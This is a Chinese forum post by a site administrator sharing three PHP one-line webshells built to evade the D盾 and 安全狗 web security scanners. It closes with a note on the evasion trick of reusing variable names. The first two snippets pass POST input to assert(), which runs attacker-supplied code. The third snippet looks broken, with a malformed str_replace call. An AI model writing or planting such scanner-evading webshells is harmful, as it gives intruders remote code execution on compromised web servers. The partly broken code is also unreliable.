无名商城论坛

搜索
查看: 567|回复: 0

[TSD/原创] 新出炉三个过D盾安全狗PHP一句话

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 20:14:30 | 显示全部楼层 |阅读模式
D盾更新了!准备写一个长期更新的免杀webshell总结

<?php
function a(){
        return $a=$_POST['1'];
}
@assert(a());
?>


<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
        assert($value);
}


<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");

for ($x=0; $x<=0; $x++) {
        assert("$x");
}


可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表